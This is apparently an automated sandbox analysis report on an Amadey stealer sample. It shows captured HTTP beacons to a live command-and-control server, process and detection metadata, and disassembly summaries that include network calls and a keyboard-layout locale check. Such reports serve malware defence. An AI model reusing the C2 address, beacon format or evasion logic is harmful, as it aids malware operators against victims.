                                      Sep 27, 2024 12:55:11.708509922 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                                      Content-Type: application/x-www-form-urlencoded
                                      Host: 185.215.113.16
                                      Content-Length: 4
                                      Cache-Control: no-cache
                                      Data Raw: 73 74 3d 73
                                      Data Ascii: st=s
                                      Sep 27, 2024 12:55:12.578684092 CEST | 219 | IN | HTTP/1.1 200 OK
                                      Server: nginx/1.18.0 (Ubuntu)
                                      Date: Fri, 27 Sep 2024 10:55:12 GMT
                                      Content-Type: text/html; charset=UTF-8
                                      Transfer-Encoding: chunked
                                      Connection: keep-alive
                                      Refresh: 0; url = Login.php
                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                      Data Ascii: 1 0
                                      Sep 27, 2024 12:55:12.582197905 CEST | 306 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                                      Content-Type: application/x-www-form-urlencoded
                                      Host: 185.215.113.16
                                      Content-Length: 152
                                      Cache-Control: no-cache
                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 42 41 35 34 46 43 33 46 41 46 44 33 33 43 32 31 38 42 41 42 38 30 38 31 43 34 35 32 45 33 44 43 37 45 37 34 37 36 43 39 44 39 30 46 46 31 46 33 32 38 38 31 46 35 31
                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEFBA54FC3FAFD33C218BAB8081C452E3DC7E7476C9D90FF1F32881F51
                                      Sep 27, 2024 12:55:12.833391905 CEST | 306 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                                      Content-Type: application/x-www-form-urlencoded
                                      Host: 185.215.113.16
                                      Content-Length: 152
                                      Cache-Control: no-cache
                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 42 41 35 34 46 43 33 46 41 46 44 33 33 43 32 31 38 42 41 42 38 30 38 31 43 34 35 32 45 33 44 43 37 45 37 34 37 36 43 39 44 39 30 46 46 31 46 33 32 38 38 31 46 35 31
                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEFBA54FC3FAFD33C218BAB8081C452E3DC7E7476C9D90FF1F32881F51
                                      Sep 27, 2024 12:55:13.146023035 CEST | 306 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                                      Content-Type: application/x-www-form-urlencoded
                                      Host: 185.215.113.16
                                      Content-Length: 152
                                      Cache-Control: no-cache
                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 42 41 35 34 46 43 33 46 41 46 44 33 33 43 32 31 38 42 41 42 38 30 38 31 43 34 35 32 45 33 44 43 37 45 37 34 37 36 43 39 44 39 30 46 46 31 46 33 32 38 38 31 46 35 31
                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEFBA54FC3FAFD33C218BAB8081C452E3DC7E7476C9D90FF1F32881F51
                                      Sep 27, 2024 12:55:13.367391109 CEST | 219 | IN | HTTP/1.1 200 OK
                                      Server: nginx/1.18.0 (Ubuntu)
                                      Date: Fri, 27 Sep 2024 10:55:12 GMT
                                      Content-Type: text/html; charset=UTF-8
                                      Transfer-Encoding: chunked
                                      Connection: keep-alive
                                      Refresh: 0; url = Login.php
                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                      Data Ascii: 1 0
                                      Sep 27, 2024 12:55:13.755270958 CEST | 306 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                                      Content-Type: application/x-www-form-urlencoded
                                      Host: 185.215.113.16
                                      Content-Length: 152
                                      Cache-Control: no-cache
                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 42 41 35 34 46 43 33 46 41 46 44 33 33 43 32 31 38 42 41 42 38 30 38 31 43 34 35 32 45 33 44 43 37 45 37 34 37 36 43 39 44 39 30 46 46 31 46 33 32 38 38 31 46 35 31
                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEFBA54FC3FAFD33C218BAB8081C452E3DC7E7476C9D90FF1F32881F51
                                      Sep 27, 2024 12:55:14.263987064 CEST | 219 | IN | HTTP/1.1 200 OK
                                      Server: nginx/1.18.0 (Ubuntu)
                                      Date: Fri, 27 Sep 2024 10:55:12 GMT
                                      Content-Type: text/html; charset=UTF-8
                                      Transfer-Encoding: chunked
                                      Connection: keep-alive
                                      Refresh: 0; url = Login.php
                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                      Data Ascii: 1 0
                                      Sep 27, 2024 12:55:14.958365917 CEST | 306 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                                      Content-Type: application/x-www-form-urlencoded
                                      Host: 185.215.113.16
                                      Content-Length: 152
                                      Cache-Control: no-cache
                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 42 41 35 34 46 43 33 46 41 46 44 33 33 43 32 31 38 42 41 42 38 30 38 31 43 34 35 32 45 33 44 43 37 45 37 34 37 36 43 39 44 39 30 46 46 31 46 33 32 38 38 31 46 35 31
                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEFBA54FC3FAFD33C218BAB8081C452E3DC7E7476C9D90FF1F32881F51
                                      Sep 27, 2024 12:55:16.055530071 CEST | 219 | IN | HTTP/1.1 200 OK
                                      Server: nginx/1.18.0 (Ubuntu)
                                      Date: Fri, 27 Sep 2024 10:55:12 GMT
                                      Content-Type: text/html; charset=UTF-8
                                      Transfer-Encoding: chunked
                                      Connection: keep-alive
                                      Refresh: 0; url = Login.php
                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                      Data Ascii: 1 0
                                      Sep 27, 2024 12:55:16.161581039 CEST | 306 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                                      Content-Type: application/x-www-form-urlencoded
                                      Host: 185.215.113.16
                                      Content-Length: 152
                                      Cache-Control: no-cache
                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 42 41 35 34 46 43 33 46 41 46 44 33 33 43 32 31 38 42 41 42 38 30 38 31 43 34 35 32 45 33 44 43 37 45 37 34 37 36 43 39 44 39 30 46 46 31 46 33 32 38 38 31 46 35 31
                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEFBA54FC3FAFD33C218BAB8081C452E3DC7E7476C9D90FF1F32881F51
                                      Sep 27, 2024 12:55:19.707447052 CEST | 219 | IN | HTTP/1.1 200 OK
                                      Server: nginx/1.18.0 (Ubuntu)
                                      Date: Fri, 27 Sep 2024 10:55:12 GMT
                                      Content-Type: text/html; charset=UTF-8
                                      Transfer-Encoding: chunked
                                      Connection: keep-alive
                                      Refresh: 0; url = Login.php
                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                      Data Ascii: 1 0
                                      Sep 27, 2024 12:55:26.871474028 CEST | 219 | IN | HTTP/1.1 200 OK
                                      Server: nginx/1.18.0 (Ubuntu)
                                      Date: Fri, 27 Sep 2024 10:55:12 GMT
                                      Content-Type: text/html; charset=UTF-8
                                      Transfer-Encoding: chunked
                                      Connection: keep-alive
                                      Refresh: 0; url = Login.php
                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                      Data Ascii: 1 0


                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                      1 | 192.168.2.9 | 49713 | 185.215.113.16 | 80 | 8080 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                      Timestamp | Bytes transferred | Direction | Data
                                      Sep 27, 2024 12:55:21.792572021 CEST | 306 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                                      Content-Type: application/x-www-form-urlencoded
                                      Host: 185.215.113.16
                                      Content-Length: 152
                                      Cache-Control: no-cache
                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 42 41 35 34 46 43 33 46 41 46 44 33 33 43 32 31 38 42 41 42 38 30 38 31 43 34 35 32 45 33 44 43 37 45 37 34 37 36 43 39 44 39 30 46 46 31 46 33 32 38 38 31 46 35 31
                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEFBA54FC3FAFD33C218BAB8081C452E3DC7E7476C9D90FF1F32881F51


                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                      2 | 192.168.2.9 | 49715 | 185.215.113.16 | 80 | 8080 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                      Timestamp | Bytes transferred | Direction | Data
                                      Sep 27, 2024 12:55:32.993370056 CEST | 306 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                                      Content-Type: application/x-www-form-urlencoded
                                      Host: 185.215.113.16
                                      Content-Length: 152
                                      Cache-Control: no-cache
                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 42 41 35 34 46 43 33 46 41 46 44 33 33 43 32 31 38 42 41 42 38 30 38 31 43 34 35 32 45 33 44 43 37 45 37 34 37 36 43 39 44 39 30 46 46 31 46 33 32 38 38 31 46 35 31
                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEFBA54FC3FAFD33C218BAB8081C452E3DC7E7476C9D90FF1F32881F51


                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                      3 | 192.168.2.9 | 49721 | 185.215.113.16 | 80 | 8080 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                      Timestamp | Bytes transferred | Direction | Data
                                      Sep 27, 2024 12:55:58.525943995 CEST | 306 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                                      Content-Type: application/x-www-form-urlencoded
                                      Host: 185.215.113.16
                                      Content-Length: 152
                                      Cache-Control: no-cache
                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 42 41 35 34 46 43 33 46 41 46 44 33 33 43 32 31 38 42 41 42 38 30 38 31 43 34 35 32 45 33 44 43 37 45 37 34 37 36 43 39 44 39 30 46 46 31 46 33 32 38 38 31 46 35 31
                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEFBA54FC3FAFD33C218BAB8081C452E3DC7E7476C9D90FF1F32881F51
                                      Sep 27, 2024 12:56:01.646148920 CEST | 306 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                                      Content-Type: application/x-www-form-urlencoded
                                      Host: 185.215.113.16
                                      Content-Length: 152
                                      Cache-Control: no-cache
                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 42 41 35 34 46 43 33 46 41 46 44 33 33 43 32 31 38 42 41 42 38 30 38 31 43 34 35 32 45 33 44 43 37 45 37 34 37 36 43 39 44 39 30 46 46 31 46 33 32 38 38 31 46 35 31
                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEFBA54FC3FAFD33C218BAB8081C452E3DC7E7476C9D90FF1F32881F51


                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                      4 | 192.168.2.9 | 49722 | 185.215.113.16 | 80 | 8080 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                      Timestamp | Bytes transferred | Direction | Data
                                      Sep 27, 2024 12:56:02.682647943 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                                      Content-Type: application/x-www-form-urlencoded
                                      Host: 185.215.113.16
                                      Content-Length: 4
                                      Cache-Control: no-cache
                                      Data Raw: 73 74 3d 73
                                      Data Ascii: st=s
                                      Sep 27, 2024 12:56:02.942955017 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                                      Content-Type: application/x-www-form-urlencoded
                                      Host: 185.215.113.16
                                      Content-Length: 4
                                      Cache-Control: no-cache
                                      Data Raw: 73 74 3d 73
                                      Data Ascii: st=s
                                      Sep 27, 2024 12:56:03.255420923 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                                      Content-Type: application/x-www-form-urlencoded
                                      Host: 185.215.113.16
                                      Content-Length: 4
                                      Cache-Control: no-cache
                                      Data Raw: 73 74 3d 73
                                      Data Ascii: st=s
                                      Sep 27, 2024 12:56:03.864888906 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                                      Content-Type: application/x-www-form-urlencoded
                                      Host: 185.215.113.16
                                      Content-Length: 4
                                      Cache-Control: no-cache
                                      Data Raw: 73 74 3d 73
                                      Data Ascii: st=s
                                      Sep 27, 2024 12:56:05.067892075 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                                      Content-Type: application/x-www-form-urlencoded
                                      Host: 185.215.113.16
                                      Content-Length: 4
                                      Cache-Control: no-cache
                                      Data Raw: 73 74 3d 73
                                      Data Ascii: st=s
                                      Sep 27, 2024 12:56:06.290822983 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                                      Content-Type: application/x-www-form-urlencoded
                                      Host: 185.215.113.16
                                      Content-Length: 4
                                      Cache-Control: no-cache
                                      Data Raw: 73 74 3d 73
                                      Data Ascii: st=s



                                      Target ID:0
                                      Start time:06:54:01
                                      Start date:27/09/2024
                                      Path:C:\Users\user\Desktop\file.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Users\user\Desktop\file.exe"
                                      Imagebase:0x10000
                                      File size:1'942'016 bytes
                                      MD5 hash:E3AA1042729BC6D0DDBED39DDB48B872
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey's stealer DLL, Source: 00000000.00000003.1378088248.0000000005200000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey's stealer DLL, Source: 00000000.00000002.1418313558.0000000000011000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                      Reputation:low
                                      Has exited:true

                                      Target ID:2
                                      Start time:06:54:04
                                      Start date:27/09/2024
                                      Path:C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe"
                                      Imagebase:0x400000
                                      File size:1'942'016 bytes
                                      MD5 hash:E3AA1042729BC6D0DDBED39DDB48B872
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey's stealer DLL, Source: 00000002.00000003.1403500499.0000000004A60000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey's stealer DLL, Source: 00000002.00000002.1443822866.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Author: Joe Security
                                      Antivirus matches:
                                      • Detection: 100%, Avira
                                      • Detection: 100%, Joe Sandbox ML
                                      • Detection: 53%, ReversingLabs
                                      Reputation:low
                                      Has exited:true

                                      Target ID:6
                                      Start time:06:55:00
                                      Start date:27/09/2024
                                      Path:C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                      Wow64 process (32bit):true
                                      Commandline:C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                      Imagebase:0x400000
                                      File size:1'942'016 bytes
                                      MD5 hash:E3AA1042729BC6D0DDBED39DDB48B872
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey's stealer DLL, Source: 00000006.00000003.1963827399.0000000004910000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey's stealer DLL, Source: 00000006.00000002.2617522656.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Author: Joe Security
                                      Reputation:low
                                      Has exited:false

                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1421037272.0000000005410000.00000040.00001000.00020000.00000000.sdmp, Offset: 05410000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_5410000_file.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: b7694e231f0618dfe902794b0dd227d037a90fd9159e4fd9d88547ab0b560cbe
                                        • Instruction ID: ac6e51573c784024cb39cc90de88328b0617641c2deb4478a2ed8ee995971c21
                                        • Opcode Fuzzy Hash: b7694e231f0618dfe902794b0dd227d037a90fd9159e4fd9d88547ab0b560cbe
                                        • Instruction Fuzzy Hash: C71181FB14C115BF6146C1456B18AFA2AAFE6D33707308467FC0ADA501F6954ACB5439

                                        Execution Graph

                                        Execution Coverage:9.3%
                                        Dynamic/Decrypted Code Coverage:0%
                                        Signature Coverage:5.2%
                                        Total number of Nodes:555
                                        Total number of Limit Nodes:28
13048 436982 13045->13048 13047 4368bd 4 API calls 13046->13047 13049 4369a6 __freea 13047->13049 13042 436559 13043 4363f7 __fassign 2 API calls 13042->13043 13044 43656a 13043->13044 12632 41b85e 12637 41b6e5 12632->12637 12634 41b886 12645 41b648 12634->12645 12636 41b89f 12638 41b6f1 Concurrency::details::_Reschedule_chore 12637->12638 12639 41b722 12638->12639 12655 41c5dc 12638->12655 12639->12634 12643 41b70c __Mtx_unlock 12644 402ad0 10 API calls 12643->12644 12644->12639 12646 41b654 Concurrency::details::_Reschedule_chore 12645->12646 12647 41c5dc GetSystemTimePreciseAsFileTime 12646->12647 12648 41b6ae 12646->12648 12649 41b669 12647->12649 12648->12636 12650 402ad0 10 API calls 12649->12650 12651 41b66f __Mtx_unlock 12650->12651 12652 402ad0 10 API calls 12651->12652 12653 41b68c __Cnd_broadcast 12652->12653 12653->12648 12654 402ad0 10 API calls 12653->12654 12654->12648 12663 41c382 12655->12663 12657 41b706 12658 402ad0 12657->12658 12659 402ada 12658->12659 12660 402adc 12658->12660 12659->12643 12680 41c19a 12660->12680 12664 41c3d8 12663->12664 12666 41c3aa 12663->12666 12664->12666 12669 41ce9b 12664->12669 12666->12657 12667 41c42d __Xtime_diff_to_millis2 12667->12666 12668 41ce9b _xtime_get GetSystemTimePreciseAsFileTime 12667->12668 12668->12667 12670 41ceaa 12669->12670 12672 41ceb7 __aulldvrm 12669->12672 12670->12672 12673 41ce74 12670->12673 12672->12667 12676 41cb1a 12673->12676 12677 41cb2b GetSystemTimePreciseAsFileTime 12676->12677 12679 41cb37 12676->12679 12677->12679 12679->12672 12681 41c1c2 12680->12681 12682 41c1a4 12680->12682 12681->12681 12682->12681 12684 41c1c7 12682->12684 12687 402aa0 12684->12687 12686 41c1de std::_Throw_future_error 12686->12682 12701 41be0f 12687->12701 12689 402abf 12689->12686 12690 438aaf __fassign 4 API calls 12691 436c26 12690->12691 12692 436c43 12691->12692 12693 436c35 12691->12693 12695 4368bd 4 API calls 12692->12695 12694 436c99 9 API calls 12693->12694 12697 436c3f 12694->12697 12698 436c5d 
12695->12698 12696 402ab4 12696->12689 12696->12690 12697->12686 12699 436c99 9 API calls 12698->12699 12700 436c71 __freea 12698->12700 12699->12700 12700->12686 12704 41cb61 12701->12704 12705 41cb6f InitOnceExecuteOnce 12704->12705 12707 41be22 12704->12707 12705->12707 12707->12696

                                        Control-flow Graph (function 40bd60; calls InternetOpenW, InternetConnectA, HttpOpenRequestA, HttpSendRequestA, InternetReadFile)
                                        APIs
                                        • InternetOpenW.WININET(00458D70,00000000,00000000,00000000,00000000), ref: 0040BDED
                                        • InternetConnectA.WININET(00000000,?,00000050,00000000,00000000,00000003,00000000,00000001), ref: 0040BE10
                                        • HttpOpenRequestA.WININET(?,00000000), ref: 0040BE5A
                                        • HttpSendRequestA.WININET(?,00000000), ref: 0040BF1B
                                        • InternetReadFile.WININET(?,?,000003FF,?), ref: 0040BFCD
                                        • InternetCloseHandle.WININET(?), ref: 0040C0A7
                                        • InternetCloseHandle.WININET(?), ref: 0040C0AF
                                        • InternetCloseHandle.WININET(?), ref: 0040C0B7
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2617522656.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000006.00000002.2617479346.0000000000400000.00000004.00000001.01000000.00000007.sdmp
                                        • Associated: 00000006.00000002.2617522656.0000000000462000.00000040.00000001.01000000.00000007.sdmp
                                        • Associated: 00000006.00000002.2621368851.0000000000469000.00000004.00000001.01000000.00000007.sdmp
                                        • Associated: 00000006.00000002.2621476181.000000000046B000.00000040.00000001.01000000.00000007.sdmp
                                        • Associated: 00000006.00000002.2621476181.0000000000603000.00000040.00000001.01000000.00000007.sdmp
                                        • Associated: 00000006.00000002.2621476181.00000000006DF000.00000040.00000001.01000000.00000007.sdmp
                                        • Associated: 00000006.00000002.2621476181.000000000070E000.00000040.00000001.01000000.00000007.sdmp
                                        • Associated: 00000006.00000002.2621476181.0000000000718000.00000040.00000001.01000000.00000007.sdmp
                                        • Associated: 00000006.00000002.2621476181.0000000000727000.00000040.00000001.01000000.00000007.sdmp
                                        • Associated: 00000006.00000002.2623801277.0000000000728000.00000080.00000001.01000000.00000007.sdmp
                                        • Associated: 00000006.00000002.2624000370.00000000008CF000.00000040.00000001.01000000.00000007.sdmp
                                        • Associated: 00000006.00000002.2624025658.00000000008D1000.00000080.00000001.01000000.00000007.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_axplong.jbxd
                                        Similarity
                                        • API ID: Internet$CloseHandle$HttpOpenRequest$ConnectFileReadSend
                                        • String ID: 8KG0fCKZFzY=$8KG0fymoFx==$RHYTYv==$RpKt$d4F$invalid stoi argument$stoi argument out of range
                                        • API String ID: 688256393-730882920
                                        • Opcode ID: 8aec45c713e83a44e22dabb790db3cb993a813797a6a01f89f3add627827598d
                                        • Instruction ID: 289012fcf8e4f5595944bd5049a2d4a8f30090e1162425a6d8c26b55887b0ffa
                                        • Opcode Fuzzy Hash: 8aec45c713e83a44e22dabb790db3cb993a813797a6a01f89f3add627827598d
                                        • Instruction Fuzzy Hash: 44B1B5B1900118DBEB24DF28CD85BDE7B65EF45304F5042AEE509A72C2D7789AC4CF99
                                        Similarity
                                        • API ID: InternetOpen$Cnd_destroy_in_situCnd_unregister_at_thread_exitConnectHttpMtx_destroy_in_situRequest
                                        • String ID: 5F6$ 6F9fr==$ JB6$ mP=$246122658369$8ZF6$9526$96B6$9KN6$Fz==$KFT0PL==$MJB+$MJF+$V0N6$V0x6$Vp 6$WJP6$aZT6$aqB6$fed3aa$stoi argument out of range$-F
                                        • API String ID: 3545240790-3817773905
                                        • Opcode ID: 405bbb22dc7553561d93291daa0936dc0e8ecc5fcb8af65c9d77aa80f6a009cb
                                        • Instruction ID: 4b31f04aa640fc13bd3c06ba17ec7330dbbfb61a3897356022f48a215646ad67
                                        • Opcode Fuzzy Hash: 405bbb22dc7553561d93291daa0936dc0e8ecc5fcb8af65c9d77aa80f6a009cb
                                        • Instruction Fuzzy Hash: FF230371A001549BEB19DB28CD897DDBB769F82308F5081DDE008A72C6EB799BC4CF59

                                        Control-flow Graph (function 405df0; calls RegOpenKeyExA, RegEnumValueW)
                                        Similarity
                                        • API ID:
                                        • String ID: 00000419$00000422$00000423$0000043f$Keyboard Layout\Preload
                                        • API String ID: 0-3963862150
                                        • Opcode ID: fbf96d77b666fe6bb60ac682d469a90b1e636845e86edade9b909977b5ed6565
                                        • Instruction ID: 36b36f9da7ac3f99c78a8b8cb35e44fc3bfab4e5c5f19681395086ef98f74fd3
                                        • Opcode Fuzzy Hash: fbf96d77b666fe6bb60ac682d469a90b1e636845e86edade9b909977b5ed6565
                                        • Instruction Fuzzy Hash: 22E1AF71900218BBEB24DFA4CD89BDEB779AF04304F5042EAE409A7291D778ABC4CF55

                                        Control-flow Graph (function 407d00; calls GetNativeSystemInfo)
                                        APIs
                                        • GetNativeSystemInfo.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407EA3
                                        Similarity
                                        • API ID: InfoNativeSystem
                                        • String ID: JmpxQb==$JmpxRL==$JmpyPb==
                                        • API String ID: 1721193555-2057465332
                                        • Opcode ID: 6637d093edc8cb564166815419777285d897dc5c560fd42cddaa2c9618472043
                                        • Instruction ID: ee985ec1b5b1516e2465fef58422cdba69c6f4bdee06230b5551153ec454a005
                                        • Opcode Fuzzy Hash: 6637d093edc8cb564166815419777285d897dc5c560fd42cddaa2c9618472043
                                        • Instruction Fuzzy Hash: 7ED13870E00614A7DB14BB29CE4A39E7B71AB42314F5442AEE405773C2EB7C5E808BDB

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1154 436e01-436e36 GetFileType 1155 436eee-436ef1 1154->1155 1156 436e3c-436e47 1154->1156 1157 436ef3-436ef6 1155->1157 1158 436f1a-436f42 1155->1158 1159 436e69-436e85 call 434020 GetFileInformationByHandle 1156->1159 1160 436e49-436e5a call 437177 1156->1160 1157->1158 1161 436ef8-436efa 1157->1161 1163 436f44-436f57 1158->1163 1164 436f5f-436f61 1158->1164 1167 436f0b-436f18 call 43740d 1159->1167 1175 436e8b-436ecd call 4370c9 call 436f71 * 3 1159->1175 1171 436e60-436e67 1160->1171 1172 436f07-436f09 1160->1172 1161->1167 1168 436efc-436f01 call 437443 1161->1168 1163->1164 1177 436f59-436f5c 1163->1177 1166 436f62-436f70 call 41cf21 1164->1166 1167->1172 1168->1172 1171->1159 1172->1166 1190 436ed2-436eea call 437096 1175->1190 1177->1164 1190->1164 1193 436eec 1190->1193 1193->1172
